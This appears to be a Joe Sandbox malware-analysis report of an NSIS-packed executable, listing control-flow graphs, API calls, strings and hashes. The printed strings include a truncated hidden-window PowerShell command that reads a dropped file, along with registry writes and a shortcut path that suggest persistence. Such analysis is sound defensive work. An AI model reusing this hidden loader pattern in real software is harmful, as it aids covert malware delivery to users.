            control_flow_graph 285 4039c7-4039df call 406558 288 4039e1-4039f1 call 4060c5 285->288 289 4039f3-403a2a call 40604b 285->289 297 403a4d-403a76 call 403c9d call 405c3a 288->297 293 403a42-403a48 lstrcatW 289->293 294 403a2c-403a3d call 40604b 289->294 293->297 294->293 303 403b08-403b10 call 405c3a 297->303 304 403a7c-403a81 297->304 310 403b12-403b19 call 4061a0 303->310 311 403b1e-403b43 LoadImageW 303->311 304->303 305 403a87-403aaf call 40604b 304->305 305->303 314 403ab1-403ab5 305->314 310->311 312 403bc4-403bcc call 40140b 311->312 313 403b45-403b75 RegisterClassW 311->313 328 403bd6-403be1 call 403c9d 312->328 329 403bce-403bd1 312->329 316 403c93 313->316 317 403b7b-403bbf SystemParametersInfoW CreateWindowExW 313->317 319 403ac7-403ad3 lstrlenW 314->319 320 403ab7-403ac4 call 405b5f 314->320 321 403c95-403c9c 316->321 317->312 322 403ad5-403ae3 lstrcmpiW 319->322 323 403afb-403b03 call 405b32 call 40617e 319->323 320->319 322->323 327 403ae5-403aef GetFileAttributesW 322->327 323->303 331 403af1-403af3 327->331 332 403af5-403af6 call 405b7e 327->332 338 403be7-403c01 ShowWindow call 4064e8 328->338 339 403c6a-403c6b call 4053b0 328->339 329->321 331->323 331->332 332->323 346 403c03-403c08 call 4064e8 338->346 347 403c0d-403c1f GetClassInfoW 338->347 342 403c70-403c72 339->342 344 403c74-403c7a 342->344 345 403c8c-403c8e call 40140b 342->345 344->329 350 403c80-403c87 call 40140b 344->350 345->316 346->347 348 403c21-403c31 GetClassInfoW RegisterClassW 347->348 349 403c37-403c5a DialogBoxParamW call 40140b 347->349 348->349 355 403c5f-403c68 call 403917 349->355 350->329 355->321
            APIs
              • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
              • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
            • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rArz0wnYVU.exe",00000000), ref: 00403A48
            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\alkylsulfater,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75923420), ref: 00403AC8
            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\alkylsulfater,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403ADB
            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AE6
            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\alkylsulfater), ref: 00403B2F
              • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
            • RegisterClassW.USER32(004291E0), ref: 00403B6C
            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B84
            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BB9
            • ShowWindow.USER32(00000005,00000000), ref: 00403BEF
            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403C1B
            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403C28
            • RegisterClassW.USER32(004291E0), ref: 00403C31
            • DialogBoxParamW.USER32(?,00000000,00403D6A,00000000), ref: 00403C50
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
            • String ID: "C:\Users\user\Desktop\rArz0wnYVU.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\alkylsulfater$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
            • API String ID: 1975747703-1411072721
            • Opcode ID: 2a24d9e712fbd0ab0b8c95ed658e9c514b03dc34f111fe87857f605435d1138a
            • Instruction ID: e7f44595d902892b35b801f2f0c3734befc0b18a393fec54347386a87508d522
            • Opcode Fuzzy Hash: 2a24d9e712fbd0ab0b8c95ed658e9c514b03dc34f111fe87857f605435d1138a
            • Instruction Fuzzy Hash: 8661C570244200BAD730AF669D49E2B3A7CEB84B49F40453FF981B62E2DB7D5912C63D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 359 402e41-402e8f GetTickCount GetModuleFileNameW call 405d53 362 402e91-402e96 359->362 363 402e9b-402ec9 call 40617e call 405b7e call 40617e GetFileSize 359->363 364 4030e0-4030e4 362->364 371 402fb9-402fc7 call 402d9f 363->371 372 402ecf-402ee6 363->372 379 403098-40309d 371->379 380 402fcd-402fd0 371->380 374 402ee8 372->374 375 402eea-402ef7 call 403358 372->375 374->375 381 403054-40305c call 402d9f 375->381 382 402efd-402f03 375->382 379->364 383 402fd2-402fea call 40336e call 403358 380->383 384 402ffc-403048 GlobalAlloc call 406677 call 405d82 CreateFileW 380->384 381->379 385 402f83-402f87 382->385 386 402f05-402f1d call 405d0e 382->386 383->379 407 402ff0-402ff6 383->407 410 40304a-40304f 384->410 411 40305e-40308e call 40336e call 4030e7 384->411 390 402f90-402f96 385->390 391 402f89-402f8f call 402d9f 385->391 386->390 405 402f1f-402f26 386->405 398 402f98-402fa6 call 406609 390->398 399 402fa9-402fb3 390->399 391->390 398->399 399->371 399->372 405->390 409 402f28-402f2f 405->409 407->379 407->384 409->390 412 402f31-402f38 409->412 410->364 418 403093-403096 411->418 412->390 414 402f3a-402f41 412->414 414->390 416 402f43-402f63 414->416 416->379 419 402f69-402f6d 416->419 418->379 420 40309f-4030b0 418->420 421 402f75-402f7d 419->421 422 402f6f-402f73 419->422 423 4030b2 420->423 424 4030b8-4030bd 420->424 421->390 425 402f7f-402f81 421->425 422->371 422->421 423->424 426 4030be-4030c4 424->426 425->390 426->426 427 4030c6-4030de call 405d0e 426->427 427->364
            APIs
            • GetTickCount.KERNEL32 ref: 00402E55
            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402E71
              • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,00438800,80000000,00000003), ref: 00405D57
              • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00402EBA
            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403001
            Strings
            • "C:\Users\user\Desktop\rArz0wnYVU.exe", xrefs: 00402E41
            • Null, xrefs: 00402F3A
            • Inst, xrefs: 00402F28
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040304A
            • Error launching installer, xrefs: 00402E91
            • soft, xrefs: 00402F31
            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403098
            • C:\Users\user\Desktop, xrefs: 00402E9C, 00402EA1, 00402EA7
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402E4B, 00403019
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
            • String ID: "C:\Users\user\Desktop\rArz0wnYVU.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
            • API String ID: 2803837635-4026942895
            • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
            • Instruction ID: e866f1dd798e5fb15c0a347603bcfded6ce2f229c2e481af73dd86df93422dd6
            • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
            • Instruction Fuzzy Hash: 9761C431A00215ABDB209F75DD49B9E7BB8EB00359F20817FF500F62D1DABD9A448B5D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 556 401767-40178c call 402bbf call 405ba9 561 401796-4017a8 call 40617e call 405b32 lstrcatW 556->561 562 40178e-401794 call 40617e 556->562 567 4017ad-4017ae call 406412 561->567 562->567 571 4017b3-4017b7 567->571 572 4017b9-4017c3 call 4064c1 571->572 573 4017ea-4017ed 571->573 581 4017d5-4017e7 572->581 582 4017c5-4017d3 CompareFileTime 572->582 575 4017f5-401811 call 405d53 573->575 576 4017ef-4017f0 call 405d2e 573->576 583 401813-401816 575->583 584 401885-4018ae call 4052dd call 4030e7 575->584 576->575 581->573 582->581 585 401867-401871 call 4052dd 583->585 586 401818-401856 call 40617e * 2 call 4061a0 call 40617e call 4058c3 583->586 598 4018b0-4018b4 584->598 599 4018b6-4018c2 SetFileTime 584->599 596 40187a-401880 585->596 586->571 619 40185c-40185d 586->619 600 402a55 596->600 598->599 602 4018c8-4018d3 CloseHandle 598->602 599->602 603 402a57-402a5b 600->603 605 4018d9-4018dc 602->605 606 402a4c-402a4f 602->606 607 4018f1-4018f4 call 4061a0 605->607 608 4018de-4018ef call 4061a0 lstrcatW 605->608 606->600 614 4018f9-40228d call 4058c3 607->614 608->614 614->603 614->606 619->596 620 40185f-401860 619->620 620->585
            APIs
            • lstrcatW.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr,C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable,?,?,00000031), ref: 004017A8
            • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr,powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr,00000000,00000000,powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr,C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable,?,?,00000031), ref: 004017CD
              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
              • Part of subcall function 004052DD: lstrlenW.KERNEL32(afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
              • Part of subcall function 004052DD: lstrcatW.KERNEL32(afledes,00402E19,00402E19,afledes,00000000,00000000,00000000), ref: 00405338
              • Part of subcall function 004052DD: SetWindowTextW.USER32(afledes,afledes), ref: 0040534A
              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable$C:\Users\user\AppData\Roaming\coabode\votiveness.lnk$C:\Users\user\Pictures\forflytningers\strudsg.Dis$powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr
            • API String ID: 1941528284-174155433
            • Opcode ID: 1c584f13cb3dd514c6ce1bb2c3950b1bb4bfd10fe82d11f244a8c0074a1ee66d
            • Instruction ID: b64174440326d41e90dd14f1ad6608c73badddfa8ee8632f400ec40acf256ac3
            • Opcode Fuzzy Hash: 1c584f13cb3dd514c6ce1bb2c3950b1bb4bfd10fe82d11f244a8c0074a1ee66d
            • Instruction Fuzzy Hash: 0C41C431900515BACF117FB5CC46DAE3679EF05329B20827BF422F51E2DA3C86629A6D

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 622 4052dd-4052f2 623 4052f8-405309 622->623 624 4053a9-4053ad 622->624 625 405314-405320 lstrlenW 623->625 626 40530b-40530f call 4061a0 623->626 628 405322-405332 lstrlenW 625->628 629 40533d-405341 625->629 626->625 628->624 630 405334-405338 lstrcatW 628->630 631 405350-405354 629->631 632 405343-40534a SetWindowTextW 629->632 630->629 633 405356-405398 SendMessageW * 3 631->633 634 40539a-40539c 631->634 632->631 633->634 634->624 635 40539e-4053a1 634->635 635->624
            APIs
            • lstrlenW.KERNEL32(afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
            • lstrlenW.KERNEL32(00402E19,afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
            • lstrcatW.KERNEL32(afledes,00402E19,00402E19,afledes,00000000,00000000,00000000), ref: 00405338
            • SetWindowTextW.USER32(afledes,afledes), ref: 0040534A
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend$lstrlen$TextWindowlstrcat
            • String ID: afledes
            • API String ID: 2531174081-2690790797
            • Opcode ID: 972aac7018336843b0c890e7bd87d5dddbcc3b404b63b40d4461520666951a00
            • Instruction ID: d14990956ab1253184f877e9e8298894284f42a30aea32824f5004b5108fa95f
            • Opcode Fuzzy Hash: 972aac7018336843b0c890e7bd87d5dddbcc3b404b63b40d4461520666951a00
            • Instruction Fuzzy Hash: 62217F71900518BACF119FA6DD44ACFBFB8EF85354F10807AF904B62A1C7B94A51DFA8

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 636 4064e8-406508 GetSystemDirectoryW 637 40650a 636->637 638 40650c-40650e 636->638 637->638 639 406510-406519 638->639 640 40651f-406521 638->640 639->640 641 40651b-40651d 639->641 642 406522-406555 wsprintfW LoadLibraryExW 640->642 641->642
            APIs
            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
            • wsprintfW.USER32 ref: 0040653A
            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040654E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: DirectoryLibraryLoadSystemwsprintf
            • String ID: %s%S.dll$UXTHEME$\
            • API String ID: 2200240437-1946221925
            • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
            • Instruction ID: c6b4a3c42f63eea3762d57d51081eb848d485012b63e63803453d9912f42ff06
            • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
            • Instruction Fuzzy Hash: 3AF0FC70500219BADB10AB64ED0DF9B366CAB00304F10403AA646F10D0EB7CD725CBA8

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 643 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 650 4023c7-4023cf 643->650 651 402a4c-402a5b 643->651 653 4023d1-4023de call 402bbf lstrlenW 650->653 654 4023e2-4023e5 650->654 653->654 656 4023f5-4023f8 654->656 657 4023e7-4023f4 call 402ba2 654->657 661 402409-40241d RegSetValueExW 656->661 662 4023fa-402404 call 4030e7 656->662 657->656 665 402422-4024fc RegCloseKey 661->665 666 40241f 661->666 662->661 665->651 666->665
            APIs
            • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
            • lstrlenW.KERNEL32(C:\Users\user\Pictures\forflytningers\strudsg.Dis,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\Pictures\forflytningers\strudsg.Dis,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\Pictures\forflytningers\strudsg.Dis,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CloseCreateValuelstrlen
            • String ID: C:\Users\user\Pictures\forflytningers\strudsg.Dis
            • API String ID: 1356686001-392751756
            • Opcode ID: f0e2339e940dc33c402bc398b4ebf085dfa1ba78c2790fe29b119279f0c59b8a
            • Instruction ID: d84b147cfae213de6894e87518a1957a70c03431d85ade02b305fde94438308f
            • Opcode Fuzzy Hash: f0e2339e940dc33c402bc398b4ebf085dfa1ba78c2790fe29b119279f0c59b8a
            • Instruction Fuzzy Hash: E511C071E00108BFEB10AFA4DE89DAE777DEB14358F11403AF904B71D1DBB85E409668

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 668 405d82-405d8e 669 405d8f-405dc3 GetTickCount GetTempFileNameW 668->669 670 405dd2-405dd4 669->670 671 405dc5-405dc7 669->671 673 405dcc-405dcf 670->673 671->669 672 405dc9 671->672 672->673
            APIs
            • GetTickCount.KERNEL32 ref: 00405DA0
            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rArz0wnYVU.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB
            Strings
            • "C:\Users\user\Desktop\rArz0wnYVU.exe", xrefs: 00405D82
            • nsa, xrefs: 00405D8F
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D87
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CountFileNameTempTick
            • String ID: "C:\Users\user\Desktop\rArz0wnYVU.exe"$C:\Users\user\AppData\Local\Temp\$nsa
            • API String ID: 1716503409-1266222087
            • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
            • Instruction ID: a69a53d4b23f3d63feeda802a3e8a765614c71270742c911b33c62312df6cecc
            • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
            • Instruction Fuzzy Hash: 32F06D76600608BBDB008B59DD09AABBBB8EF91710F10803BEE01F7190E6B09A548B64

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 674 402bff-402c28 RegOpenKeyExW 675 402c93-402c97 674->675 676 402c2a-402c35 674->676 677 402c50-402c60 RegEnumKeyW 676->677 678 402c62-402c74 RegCloseKey call 406558 677->678 679 402c37-402c3a 677->679 687 402c76-402c85 678->687 688 402c9a-402ca0 678->688 680 402c87-402c8a RegCloseKey 679->680 681 402c3c-402c4e call 402bff 679->681 685 402c90-402c92 680->685 681->677 681->678 685->675 687->675 688->685 689 402ca2-402cb0 RegDeleteKeyW 688->689 689->685 690 402cb2 689->690 690->675
            APIs
            • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
